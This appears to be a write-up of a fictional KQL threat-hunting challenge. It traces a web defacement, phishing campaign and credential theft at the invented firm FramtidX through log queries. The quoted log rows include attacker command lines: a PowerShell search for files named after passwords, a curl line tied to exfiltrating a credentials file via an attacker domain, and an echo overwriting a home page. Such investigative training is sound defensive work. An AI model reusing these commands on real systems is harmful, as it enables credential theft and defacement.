Frognado In Valdoria

We return to the futuristic, fairly-idyllic city of Valdoria; our successful investigation regarding the Valdoria Times scandal has led to FramtidX Development Corp. to request our services after their webpage was defaced; the corporation--the largest mall developer with a massive project blessed by the current mayor (whose opponent had been targeted in the previous scandal)--fears the worst.

The player is tasked with finding out how the attackers defaced the webpage to begin with, and if they've done anything else (not-really-a-spoiler: of course they did).

Sections

Section 1 - Maybe it's just a tadpole? πŸ˜’πŸ‘€

A FramtidX employee informs us that their webpage has been hacked and defaced (MITRE T1491 [ATT&CK] [D3FEND]). The threat actor calls themselves "Shadow Truth" and make heavy use of frog imagery. Since their public-facing website was targeted, it would be a good idea to contact the person in charge of maintaining it.

Employees
| summarize count() by role
Query Results
role count_
Developer 474
Architect 100
Marketing Specialist 50
Project Manager 40
HR Manager 40
Intern 19
Sales Representative 10
Quality Assurance Engineer 10
IT Specialist 5
Lead Developer 3
Chief Architect 2
Web Administrator 1
CEO 1

This query shows that there's a single Web Administrator; looking them up on the Employees table shows that they're named Anita Bath (email address anita_bath@framtidxdevcorp.com, IP address 10.10.0.8, username anbath and hostname MYZB-LAPTOP); crucially, Anita doesn't have multi-factor authentication enabled. After contacting her and discussing the matter, she insists she didn't have anything to do with the defacement "even if it looks like she did [it]."

While an insider threat is always possible, it's just as likely that her device(s) or account(s) were compromised by the threat actor; I'll take her at her word unless there's evidence to the contrary. Furthermore, the threat actor gave us their name; it's possible it'll show up among the processes executed on the Web Administrator's device.

Employees
| where role == "Web Administrator"
| distinct hostname
| lookup ProcessEvents on $left.hostname == $right.hostname
| where process_commandline has "Shadow Truth"
Query Results
hostname timestamp parent_process_name parent_process_hash process_commandline process_name process_hash username
MYZB-LAPTOP 2024-07-10 11:45:50.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f cmd.exe /C echo ^^<html^>^^<head^>^^<title^>Hacked by Shadow Truth^</title^>^^</head^>^^<body^>^^<h1^>Hacked by Shadow Truth!^</h1^>^^<p^>Your security is a joke. We have exposed your secrets for all to see.^</p^>^^<p^>Enjoy the memes!^</p^>^^<img src="images/frog_mall_meme1.jpg" alt="Hacked Meme"^>^^<img src="images/frog_mall_meme2.jpg" alt="Hacked Meme"^>^^</body^>^^</html^> ^ \\\\web-server\\inetpub\\wwwroot\\index.html cmd.exe f8b185d9e47b954aac6abded83ab1c0755640ae674905197e509d116522e96c3 anbath

Using the echo command, they overwrote the contents of index.html (the home page) with a simple HTML defacement message; the images are stored in the images directory on the Web Administrator's own device. They might've been downloaded off an attacker-controlled server. The images are frog_mall_meme1.jpg and frog_mall_meme2.jpg.

Employees
| where role == "Web Administrator"
| distinct hostname
| lookup ProcessEvents on $left.hostname == $right.hostname
| where process_commandline contains "frog_mall_meme"
Query Results
This table has been redacted; it only shows the most relevant findings, rather than the entire output of the KQL query above.
hostname timestamp parent_process_name parent_process_hash process_commandline process_name process_hash username
MYZB-LAPTOP 2024-07-10 10:53:37.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f cmd.exe /C copy C:\Users\anbath\Downloads\frog_mall_meme1.jpg C:\inetpub\wwwroot\images\frog_mall_meme1.jpg cmd.exe 5f6bdcdf580d9837ac589aa7f6cafbfaa656934049ee2cd6addb40736a4899dc anbath
MYZB-LAPTOP 2024-07-10 11:16:37.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f cmd.exe /C copy C:\Users\anbath\Downloads\frog_mall_meme2.jpg C:\inetpub\wwwroot\images\frog_mall_meme2.jpg cmd.exe 1c5ebf66638bfa0e5af0f75e00e6c5802441f1a4a6ab313dfd15251fd28b39e9 anbath

The images were downloaded shortly before the defacement; I check from where by querying OutboundNetworkEvents:

Employees
| where role == "Web Administrator"
| distinct ip_addr
| lookup OutboundNetworkEvents on $left.ip_addr == $right.src_ip
| where url contains "frog_mall_meme"
Query Results
ip_addr timestamp method user_agent url
10.10.0.8 2024-07-10 10:52:58.0000 GET Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0 https://ronniesdankmemes.com/frog_mall_meme1.jpg
10.10.0.8 2024-07-10 10:52:58.0000 GET Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0 https://ronniesdankmemes.com/frog_mall_meme2.jpg

The threat actors might be related to the ones that compromised the Valdorian Times (see my investigation on the matter), given the domain the images were downloaded from: ronniesdankmemes.com, a clear reference to the Valdorian Times employee that got her personal data exfiltrated during said event.

A lookup for this hostname against PassiveDns doesn't reveal any IPs.

Since all sources point to Anita's computer being used, her password(s) must've been compromised at some point, perhaps stolen straight from her device.

Employees
| where role == "Web Administrator"
| distinct hostname
| lookup ProcessEvents on $left.hostname == $right.hostname
| where process_commandline contains "password"
Query Results
hostname timestamp parent_process_name parent_process_hash process_commandline process_name process_hash username
MYZB-LAPTOP 2024-07-09 15:41:29.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f Get-ChildItem -Path C:\Users\anbath\Documents\* -Include *password* -Recurse powershell.exe 2b3ebd34bd0d48b1fcbd51636669401a0107bdb052862646a7f9eb7411aff0bb anbath
MYZB-LAPTOP 2024-07-10 10:28:26.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f curl.exe -o C:\ProgramData\Heartburn\mypasswordsnstuff.txt https://newdevelopmentupdates.org/mypasswordsnstuff.txt powershell.exe 6fad8666e6b9a1be4764a3b719a3747d11b95ebdbe4b0c6182834e8ff0d9ea99 anbath

Indeed, the threat actors used Get-ChildItem to get a list of all files that contain the string password, recursively across subfolders. The next day, they used curl to exfiltrate a list of credentials, likely built off the files found using Get-ChildItem. The staging folder for these operations is Heartburn, located in the target's ProgramData; this was also the name of the staging folder used by the threat actors of the Azure Crest incident (see my investigation on the matter); they're either related or using the same malware packages. Looking for this directory or its path on the FileCreationEvents table doesn't return any hits, however.

The passwords were uploaded to newdevelopmentupdates.org; querying PassiveDns does reveal two distinct IP addresses this time:

PassiveDns
| where domain == "newdevelopmentupdates.org"
| distinct ip
//2 ips
Query Results
ip
239.72.6.37
239.72.6.38

Running a recursive lookup to find any other domains reveals:

PassiveDns
| where domain == "newdevelopmentupdates.org"
| distinct ip
| lookup PassiveDns on $left.ip == $right.ip
| distinct domain
//2 domains
Query Results
domain
newdevelopmentupdates.org
greenprojectnews.net

With these domains and IP addresses I can investigate how Anita was compromised, and if anyone else was also targeted (as part of a larger campaign). I checked if any employees received emails containing these domains using:

let bad_domains =
PassiveDns
| where domain == "newdevelopmentupdates.org"
| distinct ip
| lookup PassiveDns on $left.ip == $right.ip
| distinct domain; //2 domains
Email
| where tostring(parse_url(link).Host) in (bad_domains)
Query Results
timestamp sender reply_to recipient subject verdict link
2024-06-26 13:51:20.0000 alex_johnson@framtidxdevcorp.com alex_johnson@framtidxdevcorp.com johanna_karlsson@framtidxdevcorp.com Urgent: Security Update Required CLEAN http://newdevelopmentupdates.org/public/signin
2024-06-26 14:32:20.0000 alex_johnson@framtidxdevcorp.com alex_johnson@framtidxdevcorp.com erik_bjorn@framtidxdevcorp.com Important: Architectural Plan Changes CLEAN https://greenprojectnews.net/online/images/modules/share/login.html
2024-06-26 14:32:20.0000 alex_johnson@framtidxdevcorp.com alex_johnson@framtidxdevcorp.com sofia_lindgren@framtidxdevcorp.com Important: Architectural Plan Changes CLEAN https://greenprojectnews.net/online/images/modules/share/login.html
2024-06-26 15:16:20.0000 alex_johnson@framtidxdevcorp.com alex_johnson@framtidxdevcorp.com anita_bath@framtidxdevcorp.com Web Server Credentials Update CLEAN https://greenprojectnews.net/share/modules/files/share/enter
2024-06-26 15:52:20.0000 alex_johnson@framtidxdevcorp.com alex_johnson@framtidxdevcorp.com jennifer_owens@framtidxdevcorp.com Urgent: Security Update Required CLEAN https://greenprojectnews.net/modules/sign_in
2024-06-26 15:52:20.0000 alex_johnson@framtidxdevcorp.com alex_johnson@framtidxdevcorp.com marie_doty@framtidxdevcorp.com Urgent: Security Update Required CLEAN https://greenprojectnews.net/modules/sign_in
2024-06-26 15:52:20.0000 alex_johnson@framtidxdevcorp.com alex_johnson@framtidxdevcorp.com jennifer_owens@framtidxdevcorp.com Urgent: Security Update Required CLEAN https://greenprojectnews.net/modules/sign_in

A total of 6 distinct employees were targeted (Jennifer Owens was targeted twice for reasons unknown); the emails received had alarming subject lines, came from what should be a trusted source (Developer Alex Johnson), and all attached URLs lead to fake login pages to steal credentials. The targeted employees (incl. Alex Johnson) are:

let bad_domains =
PassiveDns
| where domain == "newdevelopmentupdates.org"
| distinct ip
| lookup PassiveDns on $left.ip == $right.ip
| distinct domain; //2 domains
let T =
Email
| where tostring(parse_url(link).Host) in (bad_domains)
| distinct sender, recipient;
T
| project ["employee_list"] = sender
| union (T | project ["employee_list"] = recipient)
| distinct employee_list
| lookup Employees on $left.employee_list == $right.email_addr
Query Results
employee_list hire_date name user_agent ip_addr username role hostname mfa_enabled company_domain
marie_doty@framtidxdevcorp.com 2021-12-06 00:00:00.0000 Marie Doty Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 10.10.0.69 madoty Sales Representative APUV-LAPTOP False framtidxdevcorp.com
johanna_karlsson@framtidxdevcorp.com 2021-12-19 00:00:00.0000 Johanna Karlsson Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36 10.10.0.6 jokarlsson CEO BLVR-MACHINE False framtidxdevcorp.com
sofia_lindgren@framtidxdevcorp.com 2022-01-20 00:00:00.0000 Sofia Lindgren Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.110 Safari/537.36 10.10.0.18 solindgren Chief Architect VJVS-MACHINE False framtidxdevcorp.com
anita_bath@framtidxdevcorp.com 2023-04-26 00:00:00.0000 Anita Bath Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0 10.10.0.8 anbath Web Administrator MYZB-LAPTOP False framtidxdevcorp.com
erik_bjorn@framtidxdevcorp.com 2023-06-07 00:00:00.0000 Erik Bjorn Mozilla/5.0 (Windows NT 6.3; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0 10.10.0.3 erbjorn Chief Architect LRJP-DESKTOP True framtidxdevcorp.com
jennifer_owens@framtidxdevcorp.com 2023-10-20 00:00:00.0000 Jennifer Owens Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.78 Safari/537.36 10.10.0.72 jeowens Sales Representative DVD0-LAPTOP True framtidxdevcorp.com
alex_johnson@framtidxdevcorp.com 2024-05-01 00:00:00.0000 Alex Johnson Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 10.10.0.2 aljohnson Developer HWYH-LAPTOP True framtidxdevcorp.com

Per summarize count() by role, a developer, CEO and web administrator each were targeted, along with two chief architects and two sales representatives. Anita Bath was among the targeted, as the sole web developer; note that most don't have MFA enabled; Anita Bath doesn't have it, but Alex Johnson--who evidently was compromised--does have it enabled. To confirm who clicked the links, I use this query:

let bad_domains =
PassiveDns
| where domain == "newdevelopmentupdates.org"
| distinct ip
| lookup PassiveDns on $left.ip == $right.ip
| distinct domain; //2 domains
let T =
Email
| where tostring(parse_url(link).Host) in (bad_domains)
| distinct sender, recipient;
T
| project ["employee_list"] = sender
| union (T | project ["employee_list"] = recipient)
| distinct employee_list
| lookup Employees on $left.employee_list == $right.email_addr
| distinct role, name, ip_addr
| lookup OutboundNetworkEvents on $left.ip_addr == $right.src_ip
| where tostring(parse_url(url).Host) in (bad_domains)
Query Results
role name ip_addr timestamp method user_agent url
CEO Johanna Karlsson 10.10.0.6 2024-06-26 14:34:20.0000 GET Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36 http://newdevelopmentupdates.org/public/signin
CEO Johanna Karlsson 10.10.0.6 2024-06-26 14:34:22.0000 GET Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36 http://newdevelopmentupdates.org/public/signin?username=jokarlsson&password=**********
Chief Architect Sofia Lindgren 10.10.0.18 2024-06-26 14:57:20.0000 GET Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.110 Safari/537.36 https://greenprojectnews.net/online/images/modules/share/login.html
Chief Architect Sofia Lindgren 10.10.0.18 2024-06-26 14:57:22.0000 GET Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.110 Safari/537.36 https://greenprojectnews.net/online/images/modules/share/login.html?username=solindgren&password=**********
Chief Architect Erik Bjorn 10.10.0.3 2024-06-26 15:11:20.0000 GET Mozilla/5.0 (Windows NT 6.3; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0 https://greenprojectnews.net/online/images/modules/share/login.html
Chief Architect Erik Bjorn 10.10.0.3 2024-06-26 15:11:22.0000 GET Mozilla/5.0 (Windows NT 6.3; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0 https://greenprojectnews.net/online/images/modules/share/login.html?username=erbjorn&password=**********
Web Administrator Anita Bath 10.10.0.8 2024-06-26 15:24:20.0000 GET Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0 https://greenprojectnews.net/share/modules/files/share/enter
Web Administrator Anita Bath 10.10.0.8 2024-06-26 15:24:22.0000 GET Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0 https://greenprojectnews.net/share/modules/files/share/enter?username=anbath&password=**********
Sales Representative Marie Doty 10.10.0.69 2024-06-26 15:57:20.0000 GET Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 https://greenprojectnews.net/modules/sign_in
Sales Representative Marie Doty 10.10.0.69 2024-06-26 15:57:22.0000 GET Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 https://greenprojectnews.net/modules/sign_in?username=madoty&password=**********
Sales Representative Jennifer Owens 10.10.0.72 2024-06-26 16:12:20.0000 GET Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.78 Safari/537.36 https://greenprojectnews.net/modules/sign_in
Sales Representative Jennifer Owens 10.10.0.72 2024-06-26 16:12:22.0000 GET Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.78 Safari/537.36 https://greenprojectnews.net/modules/sign_in?username=jeowens&password=**********
Sales Representative Jennifer Owens 10.10.0.72 2024-06-26 16:13:20.0000 GET Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.78 Safari/537.36 https://greenprojectnews.net/modules/sign_in
Sales Representative Jennifer Owens 10.10.0.72 2024-06-26 16:13:22.0000 GET Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.78 Safari/537.36 https://greenprojectnews.net/modules/sign_in?username=jeowens&password=**********

All of them did, unfortunately; all of them entered their credentials. Interestingly, there are no signs of Alex Johnson having ever clicked a link affiliated with Shadow Truth--perhaps he was targeted in a different manner. Before I investigate further, I first confirm what accounts were accessed by the threat actors using:

let bad_ips =
PassiveDns
| where domain == "newdevelopmentupdates.org"
| distinct ip; //2 ips
AuthenticationEvents
| where src_ip in (bad_ips)
Query Results
timestamp hostname src_ip user_agent username result password_hash description
2024-06-20 00:00:00.0000 MAIL-SERVER01 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 aljohnson Successful Login 1e7334cf5bd803e02b8bcf339c9d5315 A user attempted to log in to their email
2024-06-27 10:35:54.0000 LRJP-DESKTOP 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 erbjorn Successful Login 2379a957d6923e72a8de3c653682ba6f User successfully logged into their machine.
2024-06-27 10:41:38.0000 VJVS-MACHINE 239.72.6.38 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 solindgren Successful Login 22886d6cb1aabf45dcd371ecaf943b5c User successfully logged into their machine.
2024-06-27 11:02:51.0000 DVD0-LAPTOP 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 jeowens Successful Login 059b26bb7f11723c48b2cf3001605282 User successfully logged into their machine.
2024-06-27 11:06:48.0000 MYZB-LAPTOP 239.72.6.38 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 anbath Successful Login 07f869b0ffcc770fad7d8631c5924ff5 User successfully logged into their machine.
2024-06-27 12:09:51.0000 DVD0-LAPTOP 239.72.6.38 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 jeowens Successful Login 059b26bb7f11723c48b2cf3001605282 User successfully logged into their machine.
2024-06-27 12:12:29.0000 APUV-LAPTOP 239.72.6.38 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 madoty Successful Login 49592e924133f6acba5a864cb0b1db08 User successfully logged into their machine.
2024-06-27 12:40:59.0000 BLVR-MACHINE 239.72.6.38 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 jokarlsson Successful Login 750a910b14d63e3ee6a37c8f49b037a9 User successfully logged into their machine.

The threat actor successfully logged into all targeted user's accounts; 7 days before sending the phishing emails, they successfully logged into Alex Johnson's account.

Section 2 - KQL 101 πŸ“š

(This section was a simple refresher on KQL basics.)

Section 3 - Alright it’s definitely an angry frog or two πŸ₯΅πŸ˜¨

Erik Bjorn, the chief architect, informed me that the page to access internal plans was defaced and that he'll try to contact the other chief architect, Sofia Lindgren, who is currently on vacation--apparently, the architectural plans for FramtidX's latest project went missing. I must note that both Erik and Sofia had their accounts compromised by the threat actor (see [9] above). As I had previously uncovered (see [8]), the Chief Architects' received phishing emails informing of alleged "architecture plan changes". Much like Anita Bath's phishing email, the subject line was tailored to their particular role in the company (chief architects and web developer, respectively); clearly, they did their research before the attack. To search for any signs of recon on FramtidX's webpage, I use:

let bad_ips =
PassiveDns
| where domain == "newdevelopmentupdates.org"
| distinct ip; //2 ips
InboundNetworkEvents
| where src_ip in (bad_ips)
Query Results
timestamp method src_ip user_agent url referrer status_code
2024-06-20 00:00:00.0000 GET 239.72.6.38 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/search%3DFramtidX%2Bleadership%2Bteam https:framtidxdevcorp.com/search 200
2024-06-20 10:15:48.0000 GET 239.72.6.38 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/search%3DCurrent%2Bproject%2Bdetails https:framtidxdevcorp.com/search 200
2024-06-20 10:16:17.0000 GET 239.72.6.38 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/search%3DArchitectural%2Bplans%2Bfor%2Bthe%2Bnew%2Bmall https:framtidxdevcorp.com/search 200
2024-06-20 10:17:06.0000 GET 239.72.6.38 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/search%3DInternal%2Bdocuments%2Brepository https:framtidxdevcorp.com/search 200
2024-06-20 10:17:42.0000 GET 239.72.6.38 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/search%3DCompany%2Bemail%2Bdirectory https:framtidxdevcorp.com/search 200
2024-06-20 10:17:50.0000 GET 239.72.6.38 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/search%3DDeveloper%2Bcontact%2Blist https:framtidxdevcorp.com/search 200
2024-06-20 10:18:18.0000 GET 239.72.6.38 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/search%3DIT%2Binfrastructure%2Boverview https:framtidxdevcorp.com/search 200
2024-06-20 10:18:54.0000 GET 239.72.6.38 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/search%3DCurrent%2Band%2Bupcoming%2Bprojects https:framtidxdevcorp.com/search 200
2024-06-20 10:19:38.0000 GET 239.72.6.38 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/search%3DSecret%2Bprojects%2Band%2Binitiatives https:framtidxdevcorp.com/search 200
2024-06-20 10:19:57.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/search%3DShady%2Bdeals%2Band%2Bagreements https:framtidxdevcorp.com/search 200
2024-06-20 10:20:15.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/search%3DEnvironmental%2Bimpact%2Breports https:framtidxdevcorp.com/search 200
2024-06-20 10:20:52.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/search%3DRecent%2Bcompany%2Bscandals https:framtidxdevcorp.com/search 200
2024-06-20 10:21:18.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/search%3DInsider%2Btrading%2Bactivities https:framtidxdevcorp.com/search 200
2024-06-20 10:22:00.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/search%3DUnethical%2Bpractices%2Bwithin%2Bthe%2Bcompany https:framtidxdevcorp.com/search 200
2024-06-20 10:22:46.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/search%3DCEO%2527s%2Bdark%2Bsecrets https:framtidxdevcorp.com/search 200
2024-06-20 10:23:26.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/search%3DWhy%2Bis%2Bthis%2Bcompany%2Bso%2Bevil%253F https:framtidxdevcorp.com/search 200
2024-06-20 10:24:25.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/search%3DEvil%2Bplans%2Band%2Bschemes https:framtidxdevcorp.com/search 200
2024-06-20 10:25:09.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/search%3DHow%2Bto%2Bexpose%2Bcorporate%2Bcorruption https:framtidxdevcorp.com/search 200
2024-06-20 10:26:06.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/search%3DContact%2Binformation%2Bfor%2BIT%2Badmins https:framtidxdevcorp.com/search 200
2024-06-20 10:26:38.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/search%3DBackdoor%2Baccess%2Bpoints https:framtidxdevcorp.com/search 200
2024-06-20 10:26:55.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/search%3DBribery%2Bschemes%2Band%2Bpayouts https:framtidxdevcorp.com/search 200
2024-06-20 10:27:18.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/search%3DCompany%2Bcover-ups https:framtidxdevcorp.com/search 200
2024-06-20 10:28:15.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/search%3DMoney%2Blaundering%2Boperations https:framtidxdevcorp.com/search 200
2024-06-20 10:29:07.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/search%3DHidden%2Boffshore%2Baccounts https:framtidxdevcorp.com/search 200
2024-06-20 10:29:44.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/search%3DOffshore%2Binvestments https:framtidxdevcorp.com/search 200
2024-06-20 10:30:21.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/search%3DWhistleblower%2Breports https:framtidxdevcorp.com/search 200
2024-06-20 10:30:23.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/search%3DEmployee%2Bcomplaints%2Band%2Bgrievances https:framtidxdevcorp.com/search 200
2024-06-20 10:30:42.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/search%3DUnethical%2Bexperiments%2Bconducted https:framtidxdevcorp.com/search 200
2024-06-20 10:30:53.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/search%3DFrog%2Bmassacre%2Bcontroversy https:framtidxdevcorp.com/search 200
2024-06-20 10:31:21.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/search%3DCorruption%2Bwithin%2Bthe%2Bcompany https:framtidxdevcorp.com/search 200
2024-06-20 10:32:07.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/search%3DForbidden%2Bfiles%2Band%2Bdocuments https:framtidxdevcorp.com/search 200
2024-06-20 10:32:19.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/search%3DSecret%2Bvault%2Bcontents https:framtidxdevcorp.com/search 200
